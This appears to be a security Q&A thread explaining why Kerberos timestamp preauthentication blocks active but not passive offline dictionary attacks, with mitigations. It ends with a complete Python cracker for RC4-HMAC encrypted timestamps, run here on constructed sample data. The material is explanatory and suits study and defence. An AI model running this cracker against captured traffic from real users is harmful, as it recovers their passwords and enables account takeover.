How does Kerberos' preauthentication increase security?
This FAQ entry (and the RFC itself) states that pre-authentication addresses a weakness in initial implementations of Kerberos that made it vulnerable to offline dictionary attacks.
The FAQ states:
The simplest form of preauthentication is known as PA-ENC-TIMESTAMP. This is simply the current timestamp encrypted with the user's key.
If an attacker manages to sniff a packet containing this preauthentication data, isn't this also vulnerable to a dictionary attack? I have the ciphertext, I know the original timestamp -- how is this scenario any different?
When you do not enforce pre-authentication, the attacker can directly send a dummy request for authentication. The KDC will return an encrypted TGT, and the attacker can brute force it offline. You will see nothing in your KDC logs except a single request for a TGT.
When you enforce timestamp pre-authentication, the attacker cannot directly ask the KDCs for the encrypted material to brute force offline. The attacker has to encrypt a timestamp with a password and offer it to the KDC. Yes, he can do this over and over, but you'll see a KDC log entry every time he fails preauth.
So, timestamp pre-authentication prevents an active attacker. It does not prevent a passive attacker from sniffing the client's encrypted timestamp message to the KDC. If the attacker can sniff that full packet, he can brute force it offline.
Mitigations to this problem include using long passwords and a good password rotation policy to make the offline brute-forcing infeasible, or using PKINIT (http://www.ietf.org/rfc/rfc4556.txt).
I found a paper (Extracting Kerberos passwords through RC4-HMAC encryption type analysis) on IEEE Xplore that is somewhat relevant to this. They seem to imply that if a pre-authentication packet is captured, it is no different.
If an attacker is able to capture the preauthentication packets and wants to take the identity of a valid user, the attacker will need to perform the procedures that the KDC performs. The attacker will need to use the decryption procedure in the agreed upon encryption type and try running different passwords against the captured data. If it is successful then the attacker has the user’s password.
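The offline attack that the first answer's passive-sniffing case and the paper quoted in the second answer describe, as an added example (this is not code from either answer or from any Kerberos implementation). It targets the RC4-HMAC encryption type (etype 23, RFC 4757) because that type's string-to-key is a single unsalted MD4 of the UTF-16LE password, so one candidate costs one hash. The block implements MD4, RC4 and the RFC 4757 encrypt/decrypt itself so it runs offline with no third-party packages; the "captured" blob, its confounder, the timestamp, the password and the wordlist are all constructed sample data, and the confounder is fixed only to make the example reproducible (a real client uses 8 random bytes).

```python
import hmac
import hashlib
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: message words in order
            a = rol((a + F(b, c, d) + X[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rol((a + G(b, c, d) + X[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: bit-reversed word order
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR; encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_string_to_key(password: str) -> bytes:
    """RFC 4757 string-to-key for etype 23: MD4 of the UTF-16LE password, i.e. the NT hash. No salt, no iterations."""
    return md4(password.encode("utf-16le"))


PA_ENC_TIMESTAMP_USAGE = 1  # key usage number for the AS-REQ PA-ENC-TIMESTAMP (RFC 4120 section 7.5.1)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encryption: output is HMAC-MD5 checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Decrypt and verify; returns the plaintext, or None when the checksum fails (wrong key)."""
    checksum, cipher = edata[:16], edata[16:]
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, cipher)
    if not hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        return None
    return data[8:]  # strip the 8-byte confounder


def crack_pa_enc_timestamp(edata: bytes, wordlist):
    """Offline dictionary attack: the attacker repeats the KDC's own check for each candidate password."""
    for candidate in wordlist:
        plaintext = rc4_hmac_decrypt(rc4_hmac_string_to_key(candidate), PA_ENC_TIMESTAMP_USAGE, edata)
        if plaintext is not None:
            return candidate, plaintext
    return None


# Constructed sample data (not a real capture). PA-ENC-TS-ENC ::= SEQUENCE { patimestamp [0] KerberosTime },
# DER-encoded, with a fixed confounder purely for reproducibility.
SAMPLE_PA_ENC_TS_ENC = b"\x30\x13\xa0\x11\x18\x0f" + b"20240101120000Z"
SAMPLE_CONFOUNDER = bytes(range(8))
SAMPLE_PASSWORD = "Winter2024"
CAPTURED_EDATA = rc4_hmac_encrypt(rc4_hmac_string_to_key(SAMPLE_PASSWORD), PA_ENC_TIMESTAMP_USAGE,
                                  SAMPLE_PA_ENC_TS_ENC, SAMPLE_CONFOUNDER)
WORDLIST = ["password", "Summer2023", "Autumn2023", "Winter2024", "Spring2024"]

if __name__ == "__main__":
    hit = crack_pa_enc_timestamp(CAPTURED_EDATA, WORDLIST)
    print("no candidate matched" if hit is None else f"password {hit[0]!r}, timestamp {hit[1][6:]!r}")
```

The success test is the HMAC-MD5 checksum verification, which is exactly the check the KDC performs; a cracker could additionally parse the recovered timestamp and require it to fall inside the normal clock-skew window, but with a 128-bit checksum a false positive is not a practical concern. Every guess here costs one MD4 plus two HMAC-MD5s and an RC4 key schedule, and the string-to-key uses no salt, so the same work cracks any capture from any user; this is why the passive attack is most serious for etype 23, whereas the AES types (17 and 18) derive the key with salted, iterated PBKDF2 and make each guess far more expensive.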